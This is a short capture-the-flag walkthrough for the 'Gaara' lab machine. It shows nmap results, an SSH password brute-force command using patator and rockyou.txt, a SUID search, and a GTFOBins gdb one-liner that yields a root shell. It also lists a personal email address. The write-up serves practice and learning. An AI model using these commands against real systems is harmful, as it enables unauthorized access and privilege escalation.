Gaara 192.168.130.142 (easy)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

http Apache httpd 2.4.38 ((Debian))

email dyuuwijaya@yahoo.com

dguuwijaga

Cracking ssh pass with:

patator ssh_login host=192.168.130.142 port=22 user=gaara password=FILE0 0=~/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.'

Checking suid bits

find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

SUID gbt give us an instant root shell!

gdb | GTFOBins

/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

PreviousCybersploit CVE-2015-1328 Nextwpwn

Last updated 2 years ago